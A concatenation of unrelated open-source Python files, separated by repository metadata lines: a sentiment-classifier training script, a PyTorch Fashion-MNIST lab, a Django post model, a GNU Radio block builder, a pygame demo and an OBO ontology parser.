t = Timer()
mongo = MongoORM("rotten")
phrases = mongo.get_collection("phrases")
for phrase in phrases:
sentiment = phrase["sentiment"]
features = []
negation = []
idx = 0
while idx < len(phrase["text"]):
miner(phrase["text"][idx], phrase["deps"][idx], features, negation)
idx += 1
if len(features) > 0:
item = {"_id": phrase["_id"],
"features": features,
"neg": negation,
"label": sentiment}
mongo.upsert_item("training_set", item)
t.measure("rotten corpus built in: ")
from pybrain.datasets import SupervisedDataSet
from pybrain.supervised.trainers import BackpropTrainer
from pybrain.tools.shortcuts import buildNetwork
from pybrain.tools.xml.networkwriter import NetworkWriter
from pybrain.tools.xml.networkreader import NetworkReader
def make_vector(model, feature_list):
vector = np.zeros(100, dtype="float32")
for feature in feature_list:
if feature in model:
vector += model[feature]
else:
# backoff to naive solution
return None
return vector
def build_training_set():
model = w2vec_model()
t = Timer()
mongo = MongoORM("rotten")
tset = mongo.get_collection("training_set")
ds = SupervisedDataSet(100, 1)
count = 0
for train_set in tset:
features = train_set["features"]
label = int(train_set["label"])
vectors = []
if len(features) > 1:
continue
for feature in features:
if type(feature[0]) is not list:
vector = make_vector(model, feature)
if vector is None:
continue
vectors.append(vector)
ds.addSample(tuple(list(vector)), (label,))
count += 1
else:
continue
# if len(feature) > 2 or type(feature[0][0]) is list:
# print features
# exit(0)
#
# vectors.append(make_vector(model, feature[0]))
# vectors.append(make_vector(model, feature[1]))
t.measure("rotten training set built in: ")
pp("Dataset size for single phrases: " + str(count))
t = Timer()
net = buildNetwork(100, 100, 1, bias=True) #, hiddenclass=TanhLayer)
trainer = BackpropTrainer(net, ds)
trainer.trainUntilConvergence(verbose=True, validationProportion=0.15, maxEpochs=1000000, continueEpochs=10)
t.measure("network train for single phrases: ")
NetworkWriter.writeToFile(net, '../data/single_phrase_nn.xml')
# print net.activateOnDataset(ds)
def test_ann():
net = NetworkReader.readFrom('../data/single_phrase_nn.xml')
model = w2vec_model()
vector = np.zeros(100, dtype="float32")
vector += model["great"]
vector += model["movie"]
ds = [list(vector)]
ds2 = SupervisedDataSet(100, 1)
ds2.addSample(tuple(ds), (4,))
print net.activateOnDataset(ds2)
def curiosity_query():
t = Timer()
mongo_rotten = MongoORM("rotten")
mongo_words = MongoORM("words")
tset = mongo_rotten.get_collection("training_set")
count = 0
ds = SupervisedDataSet(6, 1)
negs = {"n't", "not", "nor"}
for train_set in tset:
features = train_set["features"]
if len(features) > 1:
continue
if type(features[0][0]) is list:
continue
score = [0, 0, 0, 0, 0]
if len(train_set["neg"]) != 0:
negation = train_set["neg"][0]
if not negation:
negation = 0
else:
negation = 1
else:
negation = 0
for feature in features[0]:
if feature in negs:
negation = 1
positive = mongo_words.get_item_by_id("positive", feature)
if positive:
score[positive["label"]] += 1
continue
negative = mongo_words.get_item_by_id("negative", feature)
if negative:
score[negative["label"]] += 1
continue
score[2] += 1
score = [negation] + score
ds.addSample(tuple(score), (int(train_set["label"]),))
positive_count = float(score[5]) + float(0.5 * score[4])
negative_count = float(score[1]) + float(0.5 * score[2])
if negative_count == 0 and positive_count == 0:
verdict = 2
elif negative_count > 0 and not negation:
if negative_count > 1.0:
verdict = 0
else:
verdict = 1
elif negative_count > 0 and negation:
verdict = 1
elif positive_count > 0 and negation:
verdict = 1
elif positive_count > 2:
verdict = 4
else:
verdict = 3
if abs(verdict - train_set["label"]) > 1:
# # if count > 10:
pp((positive_count, negative_count))
pp((score, "verdict", verdict, "label", train_set["label"], features))
print
count += 1
if count == 10:
exit(0)
# positive_count = float(score[4]) + float(0.5 * score[3])
# negative_count = float(score[0]) + float(0.5 * score[1])
# negative_count *= 2.5
#
# verdict = 0
# if positive_count > 0 and negative_count > 0:
# if positive_count - negative_count > 0:
# verdict = 3
# elif positive_count - negative_count < 0:
# verdict = 1
# else:
# verdict = 2
# else:
# if positive_count >= 1.0:
# verdict = 4
# elif positive_count > 0:
# verdict = 3
# elif negative_count >= 1.0:
# verdict = 0
# elif negative_count > 0:
# verdict = 1
# else:
# verdict = 2
#
# if score[4] > 2 or score[0] > 2:
# if abs(verdict - train_set["label"]) > 1:
# # if count > 10:
# pp((positive_count, negative_count))
# pp((score, "verdict", verdict, "label", train_set["label"], features))
# print
#
# count += 1
# if count == 20:
# exit(0)
# exit(0)
t.measure("curiosity satisfied in: ")
# ds.saveToFile("greedy_data.xml")
#
# print "sents with no deps: ", count
#
# print len(ds)
# net = buildNetwork(6, 1, 1, bias=True)
# trainer = BackpropTrainer(net, ds)
# trainer.trainUntilConvergence(verbose=True, validationProportion=0.20, maxEpochs=10000, continueEpochs=10)
#
# t.measure("greedy algo: ")
# NetworkWriter.writeToFile(net, '../data/greedy.xml')
def main():
# augument_dataset_with_negation()
# build_rotten_dataset()
# build_training_set()
# curiosity_query()
test_ann()
if __name__ == "__main__":
main() | gpl-2.0 | -3,132,925,131,072,069,600 | 25.571809 | 112 | 0.530831 | false |
m2dsupsdlclass/lectures-labs | labs/08_frameworks/pytorch/fashion_mnist.py | 1 | 7549 | import torch
import torch.nn.functional as F
import torch.nn as nn
from matplotlib.cm import get_cmap
from torch.autograd import Variable
from torch.utils.data import TensorDataset, DataLoader
from torchvision import datasets
from torchvision.transforms import transforms
import matplotlib.pyplot as plt
english_labels = ["T-shirt/top",
"Trouser",
"Pullover",
"Dress",
"Coat",
"Sandal",
"Shirt",
"Sneaker",
"Bag",
"Ankle boot"]
cuda = False
batch_size = 32
lr = 0.01
momentum = 0.9
log_interval = 10
epochs = 6
kwargs = {'num_workers': 1, 'pin_memory': True} if cuda else {}
train_data = datasets.FashionMNIST('data', train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor(),
]))
train_loader = DataLoader(train_data, batch_size=128, shuffle=False, **kwargs)
# Lets's compute the average mean and std of the train images. We will
# use them for normalizing data later on.
n_samples_seen = 0.
mean = 0
std = 0
for train_batch, train_target in train_loader:
batch_size = train_batch.shape[0]
train_batch = train_batch.view(batch_size, -1)
this_mean = torch.mean(train_batch, dim=1)
this_std = torch.sqrt(
torch.mean((train_batch - this_mean[:, None]) ** 2, dim=1))
mean += torch.sum(this_mean, dim=0)
std += torch.sum(this_std, dim=0)
n_samples_seen += batch_size
mean /= n_samples_seen
std /= n_samples_seen
train_data = datasets.FashionMNIST('data', train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean=mean,
std=std)]))
test_data = datasets.FashionMNIST('data', train=False, download=True,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean=mean,
std=std)]))
train_loader = DataLoader(train_data, batch_size=32, shuffle=True,
**kwargs)
test_loader = DataLoader(test_data, batch_size=32, shuffle=False,
**kwargs)
class VGGCell(nn.Module):
def __init__(self, in_channel, out_channel, depth, max_pooling=True):
super(VGGCell, self).__init__()
self.convs = nn.ModuleList()
for i in range(depth):
if i == 0:
self.convs.append(nn.Conv2d(in_channel, out_channel,
kernel_size=(3, 3),
padding=1))
else:
self.convs.append(nn.Conv2d(out_channel, out_channel,
kernel_size=(3, 3),
padding=1))
self.max_pooling = max_pooling
def forward(self, x):
for conv in self.convs:
x = conv(x)
if self.max_pooling:
x = F.max_pool2d(x, kernel_size=(2, 2))
return x
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
vgg1 = VGGCell(1, 32, 1, max_pooling=True)
vgg2 = VGGCell(32, 64, 1, max_pooling=True)
self.vggs = nn.ModuleList([vgg1, vgg2])
self.dropout_2d = nn.Dropout2d(p=0.25)
self.fc1 = nn.Linear(7 * 7 * 64, 256)
self.dropout = nn.Dropout(p=0.5)
self.fc2 = nn.Linear(256, 10)
def forward(self, x):
for vgg in self.vggs:
x = self.dropout_2d(vgg(x))
x = x.view(-1, 7 * 7 * 64)
x = F.relu(self.fc1(x))
x = self.dropout(x)
x = self.fc2(x)
return F.log_softmax(x, dim=1)
# Let's test our model on CPU
model = Model()
img, target = train_data[0]
# n_channel, width, height
print(img.shape)
fig, ax = plt.subplots(1, 1)
ax.imshow(img[0].numpy(), cmap=get_cmap('gray'))
plt.show()
# First dimension should contain batch_size
img = img[None, :]
img = Variable(img)
pred = model(img)
print(target, english_labels[target])
print(pred)
if cuda:
model.cuda()
optimizer = torch.optim.SGD(model.parameters(), lr=lr, momentum=momentum)
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer,
T_max=5,
last_epoch=-1)
def train(epoch):
model.train()
train_loss = 0
for batch_idx, (data, target) in enumerate(train_loader):
if cuda:
data, target = data.cuda(), target.cuda()
batch_size = data.shape[0]
data, target = Variable(data), Variable(target)
optimizer.zero_grad()
output = model(data)
loss = F.nll_loss(output, target)
loss.backward()
optimizer.step()
train_loss += loss.data[0] * batch_size
if batch_idx % log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch + 1, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.data[0]))
train_loss /= len(test_loader.dataset)
return train_loss
def test():
model.eval()
test_loss = 0
correct = 0
for data, target in test_loader:
if cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data, volatile=True), Variable(target)
output = model(data)
test_loss += F.nll_loss(output, target, size_average=False).data[0]
# sum up batch loss
_, pred = output.data.max(dim=1)
# get the index of the max log-probability
correct += torch.sum(pred == target.data.long())
test_loss /= len(test_loader.dataset)
test_accuracy = correct / len(test_loader.dataset)
print('\nTest set: Average loss: {:.4f},'
' Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(test_loader.dataset),
100. * test_accuracy))
return test_loss, test_accuracy
logs = {'epoch': [], 'train_loss': [], 'test_loss': [],
'test_accuracy': [], 'lr': []}
for epoch in range(epochs):
train_loss = train(epoch)
test_loss, test_accuracy = test()
logs['epoch'].append(epoch)
logs['train_loss'].append(train_loss)
logs['test_loss'].append(test_loss)
logs['test_accuracy'].append(test_accuracy)
logs['lr'].append(optimizer.param_groups[0]['lr'])
scheduler.step(epoch)
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(8, 12))
ax1.plot(logs['epoch'], list(zip(logs['train_loss'],
logs['test_loss'],
logs['test_accuracy'])))
ax1.legend(['Train loss', 'Test loss', 'Test accuracy'])
ax2.plot(logs['epoch'], logs['lr'],
label='Learning rate')
ax2.legend()
# Let's see what our model can do
test_img, true_target = test_data[42]
fig, ax = plt.subplots(1, 1)
ax.imshow(test_img[0].numpy(), cmap=get_cmap('gray'))
plt.show()
test_img = test_img[None, :]
if cuda:
test_img = test_img.cuda()
test_img = Variable(test_img, volatile=True)
pred = model(test_img)
_, target = torch.max(pred, dim=1)
target = target.data[0]
print(english_labels[target])
| mit | -6,136,229,963,483,149,000 | 31.821739 | 78 | 0.543913 | false |
arturtamborski/wypok | wypok/posts/models.py | 1 | 1761 | from django.urls import reverse
from django.contrib.auth import get_user_model
from django.db import models
from django.conf import settings
from wypok.validators import FileValidator
from wypok.utils.markup import markup
from wypok.utils.slugify import slugify_max
from sections.models import Section
def posts_attachment_path(instance, filename):
return settings.POSTS_ATTACHMENT_PATH.format(id=instance.id, name=filename)
class PostQuerySet(models.QuerySet):
pass
class Post(models.Model):
class Meta:
ordering = ('-date',)
objects = PostQuerySet.as_manager()
section = models.ForeignKey(Section, on_delete=models.CASCADE)
author = models.ForeignKey(get_user_model(), on_delete=models.CASCADE)
title = models.CharField(max_length=256)
slug = models.SlugField(max_length=32, editable=False)
link = models.URLField(max_length=256, default='', blank=True)
date = models.DateTimeField(auto_now_add=True, editable=False)
content = models.TextField(blank=True)
content_html = models.TextField(editable=False, blank=True)
attachment = models.FileField(max_length=256, blank=True, null=True,
upload_to=posts_attachment_path,
validators=[FileValidator(content_types=settings.POSTS_ALLOWED_CONTENT_TYPES)])
def save(self, *args, **kwargs):
self.slug = slugify_max(self.title, 32)
self.content_html = markup(self.content)
self.full_clean()
super().save(*args, **kwargs)
def __str__(self):
return self.slug
def prettify(self):
return self.title
def get_owner(self):
return self.author
def get_absolute_url(self):
return reverse('sections:posts:detail', args=[self.section, self.id, self.slug])
| mit | -3,024,259,250,169,399,000 | 30.446429 | 88 | 0.707553 | false |
skoslowski/gnuradio | grc/core/blocks/_build.py | 1 | 5788 | # Copyright 2016 Free Software Foundation, Inc.
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-2.0-or-later
#
from __future__ import absolute_import
import itertools
import re
from ..Constants import ADVANCED_PARAM_TAB
from ..utils import to_list
from ..Messages import send_warning
from .block import Block
from ._flags import Flags
from ._templates import MakoTemplates
def build(
id,
label="",
category="",
flags="",
documentation="",
value=None,
asserts=None,
parameters=None,
inputs=None,
outputs=None,
templates=None,
cpp_templates=None,
**kwargs
):
block_id = id
cls = type(str(block_id), (Block,), {})
cls.key = block_id
cls.label = label or block_id.title()
cls.category = [cat.strip() for cat in category.split("/") if cat.strip()]
cls.flags = Flags(flags)
if re.match(r"options$|variable|virtual", block_id):
cls.flags.set(Flags.NOT_DSP, Flags.DISABLE_BYPASS)
cls.documentation = {"": documentation.strip("\n\t ").replace("\\\n", "")}
cls.asserts = [_single_mako_expr(a, block_id) for a in to_list(asserts)]
cls.inputs_data = build_ports(inputs, "sink") if inputs else []
cls.outputs_data = build_ports(outputs, "source") if outputs else []
cls.parameters_data = build_params(
parameters or [],
bool(cls.inputs_data),
bool(cls.outputs_data),
cls.flags,
block_id,
)
cls.extra_data = kwargs
templates = templates or {}
cls.templates = MakoTemplates(
imports=templates.get("imports", ""),
make=templates.get("make", ""),
callbacks=templates.get("callbacks", []),
var_make=templates.get("var_make", ""),
)
cpp_templates = cpp_templates or {}
cls.cpp_templates = MakoTemplates(
includes=cpp_templates.get("includes", []),
make=cpp_templates.get("make", ""),
callbacks=cpp_templates.get("callbacks", []),
var_make=cpp_templates.get("var_make", ""),
link=cpp_templates.get("link", []),
translations=cpp_templates.get("translations", []),
declarations=cpp_templates.get("declarations", ""),
)
# todo: MakoTemplates.compile() to check for errors
cls.value = _single_mako_expr(value, block_id)
return cls
def build_ports(ports_raw, direction):
ports = []
port_ids = set()
stream_port_ids = itertools.count()
for i, port_params in enumerate(ports_raw):
port = port_params.copy()
port["direction"] = direction
port_id = port.setdefault("id", str(next(stream_port_ids)))
if port_id in port_ids:
raise Exception(
'Port id "{}" already exists in {}s'.format(port_id, direction)
)
port_ids.add(port_id)
ports.append(port)
return ports
def build_params(params_raw, have_inputs, have_outputs, flags, block_id):
params = []
def add_param(**data):
params.append(data)
if flags.SHOW_ID in flags:
add_param(id="id", name="ID", dtype="id", hide="none")
else:
add_param(id="id", name="ID", dtype="id", hide="all")
if not flags.not_dsp:
add_param(
id="alias",
name="Block Alias",
dtype="string",
hide="part",
category=ADVANCED_PARAM_TAB,
)
if have_outputs or have_inputs:
add_param(
id="affinity",
name="Core Affinity",
dtype="int_vector",
hide="part",
category=ADVANCED_PARAM_TAB,
)
if have_outputs:
add_param(
id="minoutbuf",
name="Min Output Buffer",
dtype="int",
hide="part",
default="0",
category=ADVANCED_PARAM_TAB,
)
add_param(
id="maxoutbuf",
name="Max Output Buffer",
dtype="int",
hide="part",
default="0",
category=ADVANCED_PARAM_TAB,
)
base_params_n = {}
for param_data in params_raw:
param_id = param_data["id"]
if param_id in params:
raise Exception('Param id "{}" is not unique'.format(param_id))
if "option_attributes" in param_data:
_validate_option_attributes(param_data, block_id)
base_key = param_data.get("base_key", None)
param_data_ext = base_params_n.get(base_key, {}).copy()
param_data_ext.update(param_data)
add_param(**param_data_ext)
base_params_n[param_id] = param_data_ext
add_param(
id="comment",
name="Comment",
dtype="_multiline",
hide="part",
default="",
category=ADVANCED_PARAM_TAB,
)
return params
def _single_mako_expr(value, block_id):
if not value:
return None
value = value.strip()
if not (value.startswith("${") and value.endswith("}")):
raise ValueError("{} is not a mako substitution in {}".format(value, block_id))
return value[2:-1].strip()
def _validate_option_attributes(param_data, block_id):
if param_data["dtype"] != "enum":
send_warning(
"{} - option_attributes are for enums only, ignoring".format(block_id)
)
del param_data["option_attributes"]
else:
for key in list(param_data["option_attributes"].keys()):
if key in dir(str):
del param_data["option_attributes"][key]
send_warning(
'{} - option_attribute "{}" overrides str, ignoring'.format(
block_id, key
)
)
| gpl-3.0 | 5,468,785,309,365,975,000 | 27.234146 | 87 | 0.555632 | false |
LewisSarcasm/PingAI | hello.py | 1 | 1770 | import pygame, sys
from pygame.locals import *
import random
WIDTH = 640
HEIGHT = 480
screen = pygame.display.set_mode((WIDTH, HEIGHT), 0, 32)
pygame.display.set_caption("PongAI")
clock = pygame.time.Clock()
balls = []
for _ in range(500):
ball = {
"x": random.randrange(0, WIDTH),
"y": random.randrange(0, HEIGHT),
"xvel": random.randrange(-4, 4),
"yvel": random.randrange(-4, 4),
"r": 10,
"color": (random.randrange(0, 0xFF), random.randrange(0, 0xFF), random.randrange(0, 0xFF))
}
balls.append(ball)
bat = {
"x": 30,
"y": HEIGHT/2,
"width": 10, # actually, half the width and height
"height": 50,
"color": (0xFF, 0xFF, 0xFF)
}
while True:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
screen.fill((0, 0, 0)) # clear the screen with black
for ball in balls:
pygame.draw.rect(screen, ball["color"], (ball["x"]-ball["r"], ball["y"]-ball["r"], ball["r"]*2, ball["r"]*2), 0)
ball["x"] += ball["xvel"]
ball["y"] += ball["yvel"]
# wall collision
if (ball["xvel"] > 0 and ball["x"] + ball["r"] > WIDTH) or (ball["xvel"] < 0 and ball["x"] - ball["r"] < 0):
ball["xvel"] *= -1
if (ball["yvel"] > 0 and ball["y"] + ball["r"] > HEIGHT) or (ball["yvel"] < 0 and ball["y"] - ball["r"] < 0):
ball["yvel"] *= -1
# bat collision
if (abs(ball["y"] - bat["y"]) < (bat["height"] + ball["r"])) and ((ball["xvel"] > 0 and ball["x"] > WIDTH/2 and ball["x"] + ball["r"] > bat["x"] - bat["width"]) or (ball["xvel"] < 0 and ball["x"] < WIDTH/2 and ball["x"] - ball["r"] < bat["x"] + bat["width"])):
ball["xvel"] *= -1
pygame.draw.rect(screen, bat["color"], (bat["x"]-bat["width"], bat["y"]-bat["height"], bat["width"]*2, bat["height"]*2), 0)
pygame.display.update()
clock.tick(60)
| mit | -7,116,693,056,600,813,000 | 29.517241 | 262 | 0.575141 | false |
ales-erjavec/orange-bio | orangecontrib/bio/ontology.py | 2 | 32024 | """
==============================
OBO Ontology (:mod:`ontology`)
==============================
This module provides an interface for parsing, creating and manipulating of
`OBO ontologies <http://www.obofoundry.org/>`_.
Construct an ontology from scratch with custom terms ::
>>> term = OBOObject("Term", id="foo:bar", name="Foo bar")
>>> print(term)
[Term]
id: foo:bar
name: Foo bar
>>> ontology = OBOOntology()
>>> ontology.add_object(term)
>>> ontology.add_header_tag("created-by", "ales") # add a header tag
>>> from six import StringIO
>>> buffer = StringIO()
>>> ontology.write(buffer) # Save the ontology to a file like object
>>> print(buffer.getvalue()) # Print the contents of the buffer
created-by: ales
<BLANKLINE>
[Term]
id: foo:bar
name: Foo bar
<BLANKLINE>
To load an ontology from a file, pass the file or filename to the
:class:`OBOOntology` constructor or call its load method ::
>>> _ = buffer.seek(0) # rewind
>>> ontology = OBOOntology(buffer)
>>> # Or equivalently
>>> _ = buffer.seek(0) # rewind
>>> ontology = OBOOntology()
>>> ontology.load(buffer)
See the definition of the `.obo file format
<http://www.geneontology.org/GO.format.obo-1_2.shtml>`_.
"""
from __future__ import print_function
import sys
import re
import warnings
import keyword
import operator
from functools import reduce
from collections import defaultdict
import six
from six import StringIO
try:
from urllib2 import urlopen
except ImportError:
from urllib.request import urlopen
if sys.version_info >= (3,):
intern = sys.intern
#: These are builtin OBO objects present in any ontology by default.
BUILTIN_OBO_OBJECTS = [
"""[Typedef]
id: is_a
name: is_a
range: OBO:TERM_OR_TYPE
domain: OBO:TERM_OR_TYPE
definition: The basic subclassing relationship [OBO:defs]""",
"""[Typedef]
id: disjoint_from
name: disjoint_from
range: OBO:TERM
domain: OBO:TERM
definition: Indicates that two classes are disjoint [OBO:defs]""",
"""[Typedef]
id: instance_of
name: instance_of
range: OBO:TERM
domain: OBO:INSTANCE
definition: Indicates the type of an instance [OBO:defs]""",
"""[Typedef]
id: inverse_of
name: inverse_of
range: OBO:TYPE
domain: OBO:TYPE
definition: Indicates that one relationship type is the inverse of another [OBO:defs]""",
"""[Typedef]
id: union_of
name: union_of
range: OBO:TERM
domain: OBO:TERM
definition: Indicates that a term is the union of several others [OBO:defs]""",
"""[Typedef]
id: intersection_of
name: intersection_of
range: OBO:TERM
domain: OBO:TERM
definition: Indicates that a term is the intersection of several others [OBO:defs]"""
]
def _split_and_strip(string, sep):
"""
Split the `string` by separator `sep` in to two parts and strip
any whitespace between the inner parts.
"""
head, tail = _split_esc(string, sep)
return head.rstrip(" "), tail.lstrip(" ")
def _rsplit_and_strip(string, sep):
"""
Right split the `string` by separator `sep` in to two parts and
strip any whitespace between the inner parts.
"""
head, tail = _rsplit_esc(string, sep)
return head.rstrip(" "), tail.lstrip(" ")
def _find_esc(string, char):
i = string.find(char)
while i != -1:
if (i > 0 and string[i - 1] != "\\") or string[i - 1] != "\\":
return i
else:
i = string.find(char, i + 1)
return i
def _rfind_esc(string, char):
i = string.rfind(char)
while i != -1:
if (i > 0 and string[i - 1] != "\\") or string[i - 1] != "\\":
return i
else:
i = string.rfind(char, 0, i - 1)
return i
def _split_esc(string, sep, _find_esc=_find_esc):
i = _find_esc(string, sep)
if i != -1:
return string[:i], string[i + 1:]
else:
return string, ""
def _rsplit_esc(string, sep):
i = _rfind_esc(string, sep)
if i != -1:
return string[:i], string[i + 1:]
else:
return string, ""
def parse_tag_value(tag_value_string):
"""
Parse a tag value string and return a four-tuple containing
a (tag, value, modifiers, comment). If comment or modifiers are
not present the corresponding entry will be ``None``.
>>> parse_tag_value("foo: bar {modifier=frob} ! Comment")
('foo', 'bar', 'modifier=frob', 'Comment')
>>> parse_tag_value("foo: bar")
('foo', 'bar', None, None)
>>> parse_tag_value("foo: bar [baz:0] { fizz=buzz } ! Comment")
('foo', 'bar [baz:0]', 'fizz=buzz', 'Comment')
"""
comment = modifiers = None
# First get rid of the comment if present
if _rfind_esc(tag_value_string, "!") != -1:
tag_value_string, comment = _rsplit_and_strip(tag_value_string, "!")
# Split on the first unescaped ":"
tag, value = _split_and_strip(tag_value_string, ":")
# Split the value on { to get the modifiers if present
value = value.rstrip()
if value.endswith("}") and not value.endswith(r"\}") and \
_rfind_esc(value, "{") != -1:
value, modifiers = _rsplit_and_strip(value, "{")
# remove closing } and any whitespace
modifiers = modifiers[: -1].rstrip()
return tag, value, modifiers, comment
_quotedstr_re = re.compile(r'"(.*?(?<!\\))"')
class OBOObject(object):
"""
A generic OBO object (e.g. Term, Typedef, Instance, ...).
Example::
>>> term = OBOObject(stanza_type="Term", id="FOO:001", name="bar")
>>> term = OBOObject(
... stanza_type="Term",
... id="FOO:001",
... name="bar",
... def_="Example definition { modifier=frob } ! Comment"
... )
...
An alternative way to specify tags in the constructor::
>>> term = OBOObject(stanza_type="Term", id="FOO:001", name="bar",
... def_=("Example definition",
... [("modifier", "frob")],
... "Comment"))
...
.. note::
Note the use of ``def_`` to define the 'def' tag. This is to
avoid the name clash with the python's ``def`` keyword.
.. seealso:: :class:`Term` :class:`Typedef` :class:`Instance`
"""
Dispatch = {}
def __init__(self, stanza_type="Term", **kwargs):
"""
Initialize from keyword arguments.
"""
self.stanza_type = stanza_type
self.tag_values = []
self.values = {}
sorted_tags = sorted(
six.iteritems(kwargs),
key=lambda key_val: chr(1) if key_val[0] == "id" else key_val[0]
)
for tag, value in sorted_tags:
if isinstance(value, six.string_types):
tag, value, modifiers, comment = \
parse_tag_value(name_demangle(tag) + ": " + value)
elif isinstance(value, tuple):
tag, value, modifiers, comment = \
((name_demangle(tag),) + value + (None, None))[:4]
self.add_tag(tag, value, modifiers, comment)
self.related = set()
@property
def is_annonymous(self):
"""
Is this object anonymous.
"""
value = self.get_values("is_annonymous")
return bool(value)
@property
def id(self):
"""
The id of this object.
"""
value = self.get_values("id")
return value[0] if value else None
@property
def name(self):
"""
Name of this object
"""
value = self.get_values("name")
return value[0] if value else None
@property
def namespace(self):
"""
namespace tag or None if not defined
"""
values = self.get_values("namespace")
assert 0 <= len(values) <= 1
return values[0] if values else None
@property
def alt_id(self):
return self.get_values("alt_id")
@property
def subset(self):
return self.get_values("subset")
@property
def definition(self):
# synonym for def_
return self.def_
@property
def def_(self):
values = self.get_values("def")
assert 0 <= len(values) <= 1
if not values:
return None
definition = values[0]
match = _quotedstr_re.match(definition)
return match.groups()[0]
@property
def comment(self):
values = self.get_values("comment")
assert 0 <= len(values) <= 1
return values[0] if values else None
@property
def synonyms(self):
values = self.get_values("synonym")
syn = []
for v in values:
match = _quotedstr_re.match(v)
syn.append(match.groups()[0])
return syn
def name_mangle(self, tag):
return name_mangle(tag)
def name_demangle(self, tag):
return name_demangle(tag)
def add_tag(self, tag, value, modifiers=None, comment=None):
"""
Add `tag`, `value` pair to the object with optional modifiers and
comment.
Example::
>>> term = OBOObject("Term")
>>> term.add_tag("id", "FOO:002", comment="This is an id")
>>> print(term)
[Term]
id: FOO:002 ! This is an id
"""
tag = intern(tag) # a small speed and memory benefit
self.tag_values.append((tag, value, modifiers, comment))
self.values.setdefault(tag, []).append(value)
def add_tags(self, tag_value_iter):
for tag, value, modifiers, comment in tag_value_iter:
self.tag_values.append((tag, value, modifiers, comment))
self.values.setdefault(tag, []).append(value)
def update(self, other):
"""
Update the term with tag value pairs from `other`
(:class:`OBOObject`). The tag value pairs are appended to the
end except for the `id` tag.
"""
for tag, value, modifiers, comment in other.tag_values:
if tag != "id":
self.add_tag(tag, value, modifiers, comment)
def get_values(self, tag):
try:
return self.values[tag]
except KeyError:
return []
def tag_count(self):
"""
Return the number of tags in this object.
"""
return len(self.tag_values)
def tags(self):
"""
Return an list of all (tag, value, modifiers, comment) tuples.
"""
return list(self.tag_values)
def _format_single_tag(self, index):
"""
Return a formated string representing index-th tag pair value.
Example::
>>> term = OBOObject(
... "Term", id="FOO:001", name="bar",
... def_="Example definition {modifier=frob} ! Comment")
...
>>> term._format_single_tag(0)
'id: FOO:001'
>>> term._format_single_tag(1)
'def: Example definition { modifier=frob } ! Comment'
..
Why by index, and not by tag? Multiple tags are allowed.
"""
tag, value, modifiers, comment = self.tag_values[index]
res = ["%s: %s" % (tag, value)]
if modifiers:
res.append("{ %s }" % modifiers)
if comment:
res.append("! " + comment)
return " ".join(res)
def format_stanza(self):
"""
Return a string stanza representation of this object.
"""
stanza = ["[%s]" % self.stanza_type]
for i in range(self.tag_count()):
stanza.append(self._format_single_tag(i))
return "\n".join(stanza)
@classmethod
def parse_stanza(cls, stanza):
r"""
Parse and return an OBOObject instance from a stanza string.
>>> term = OBOObject.parse_stanza(
... '''[Term]
... id: FOO:001
... name: bar
... ''')
>>> print(term.id, term.name)
FOO:001 bar
"""
lines = stanza.splitlines()
stanza_type = lines[0].strip("[]")
tag_values = [parse_tag_value(line) for line in lines[1:]
if ":" in line]
obo = OBOObject.Dispatch[stanza_type]()
obo.add_tags(tag_values)
return obo
def related_objects(self):
"""
Return a list of tuple pairs where the first element is
relationship (typedef id) and the second object id whom the
relationship applies to.
"""
result = [(type_id, id)
for type_id in ["is_a"] # TODO add other defined Typedef ids
for id in self.values.get(type_id, [])]
result = result + [tuple(r.split(None, 1))
for r in self.values.get("relationship", [])]
return result
def __str__(self):
"""
Return a string representation of the object in OBO format
"""
return self.format_stanza()
def __repr__(self):
return ("{0.__name__}(id={1.id!r}, name={1.name}, ...)"
.format(type(self), self))
def __iter__(self):
"""
Iterates over sub terms
"""
return iter(self.related_objects())
class Term(OBOObject):
"""
A 'Term' object in the ontology.
"""
def __init__(self, *args, **kwargs):
OBOObject.__init__(self, "Term", *args, **kwargs)
@property
def is_obsolete(self):
"""
Is this term obsolete.
"""
value = self.get_values("is_obsolete")
return value[0].lower() == "true" if value else False
class Typedef(OBOObject):
"""
A 'Typedef' object in the ontology.
"""
def __init__(self, *args, **kwargs):
OBOObject.__init__(self, "Typedef", *args, **kwargs)
class Instance(OBOObject):
"""
An 'Instance' object in the ontology
"""
def __init__(self, *args, **kwargs):
OBOObject.__init__(self, "Instance", *args, **kwargs)
OBOObject.Dispatch = {"Term": Term, "Typedef": Typedef, "Instance": Instance}
class OBOParser(object):
r""" A simple parser for .obo files (inspired by xml.dom.pulldom)
>>> from six import StringIO
>>> file = StringIO('''
... header_tag: header_value
... [Term]
... id: FOO:001 { modifier=bar } ! comment
... ''')
>>> parser = OBOParser(file)
>>> for event, value in parser:
... print(event, value)
...
HEADER_TAG ['header_tag', 'header_value']
START_STANZA Term
TAG_VALUE ('id', 'FOO:001', 'modifier=bar', 'comment')
CLOSE_STANZA None
"""
def __init__(self, file):
self.file = file
def parse(self, progress_callback=None):
"""
Parse the file and yield parse events.
.. todo List events and values
"""
data = self.file.read()
header = data[: data.index("\n[")]
body = data[data.index("\n[") + 1:]
for line in header.splitlines():
if line.strip():
yield "HEADER_TAG", line.split(": ", 1)
current = None
# For speed make these functions local
startswith = str.startswith
endswith = str.endswith
parse_tag_value_ = parse_tag_value
for line in body.splitlines():
if startswith(line, "[") and endswith(line, "]"):
yield "START_STANZA", line.strip("[]")
current = line
elif startswith(line, "!"):
yield "COMMENT", line[1:]
elif line:
yield "TAG_VALUE", parse_tag_value_(line)
else: # empty line is the end of a term
yield "CLOSE_STANZA", None
current = None
if current is not None:
yield "CLOSE_STANZA", None
def __iter__(self):
"""
Iterate over parse events (same as parse())
"""
return self.parse()
class OBOOntology(object):
"""
An class representing an OBO ontology.
:param file-like file:
A optional file like object describing the ontology in obo format.
"""
BUILTINS = BUILTIN_OBO_OBJECTS
def __init__(self, file=None):
self.objects = []
